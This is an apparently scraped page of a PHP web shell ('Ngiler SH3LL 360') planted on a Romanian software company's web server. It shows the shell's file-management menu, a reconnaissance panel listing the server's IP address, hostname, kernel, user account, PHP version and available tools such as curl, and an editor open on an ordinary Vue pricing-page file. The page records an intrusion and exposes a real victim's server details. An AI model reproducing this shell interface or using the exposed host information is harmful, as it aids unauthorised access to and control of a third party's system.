Ngiler SH3LL 360
Home
Information
Create File
Create Folder
:
/
home
/
tbf
/
newweb.tbf.ro_simple
/
src
/
views
/
TbfDigital
/
Information Server
MySQL :
OFF
Perl :
OFF
CURL :
ON
WGET :
OFF
PKEXEC :
OFF
Directive
Local Value
IP Address
89.40.16.97
System
Linux server.atelieruldeit.ro 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
User
tbf
PHP Version
7.3.33
Software
Apache
Doc root
Writable
close
Edit File :
Pricing.vue
| Size :
2.33
KB
Copy
<template> <div class="pricing"> <section-1 /> <section-2 /> <section-3 /> <footer-tbf-mob v-if="$mq.below(960)"/> <footer-tbf v-else/> </div> </template> <script> import Section1 from '@/components/TbfDigital/pricing/SectionDesktop01' import Section2 from '@/components/TbfDigital/desktop/Section11' import Section3 from '@/components/TbfDigital/pricing/SectionFAQ' import FooterTbf from '@/components/TbfDigital/desktop/FooterTbf' import FooterTbfMob from '@/components/TbfDigital/mobile/FooterTbf' export default { data() { return { meta: { title: "Software Românesc de Management prin Obiective", description: "TBF Digital este bazat pe un sistem complet de management, prin obiective și responsabilități clare, care îți permite să ai control și să scalezi fără să faci micromanagement.", image: process.env.VUE_APP_BASE_URL+"/build/images/share/Share - Digital.png" } }; }, components: { Section1, Section2, Section3, FooterTbf, FooterTbfMob }, mounted: function() { }, methods: { }, metaInfo() { return { title: this.meta.title, titleTemplate: '%s « TBF', htmlAttrs: { lang: 'ro', amp: null }, meta: [ { name: 'description', content: this.meta.description}, { image: 'name', content: this.meta.title }, { image: 'description', content: this.meta.description }, { itemprop: 'image', content: this.meta.image }, // GOOGLE { name: 'robots', content: 'follow' }, { name: 'author', content: 'TBF.ro' }, { name: 'copyright', content: '' }, // FACEBOOK { property: "og:title", content: this.meta.title }, { property: "og:type", content: 'article' }, { property: "og:description", content: this.meta.description }, { property: "og:url", content: process.env.VUE_APP_BASE_URL+"/tbf-digital" }, { property: "fb:app_id", content: process.env.MIX_FB_ID }, { property:"og:image", content: this.meta.image }, // TWITTER { name: 'twitter:card', content: 'summary' }, { name: 'twitter:description', content: this.meta.description }, { name: 'twitter:title', content: this.meta.title }, { name: 'twitter:site', content: '@TBF' }, { name: 'twitter:creator', content: '@TBF' }, { name: 'twitter:image', content: this.meta.image }, ], } }, } </script>
Back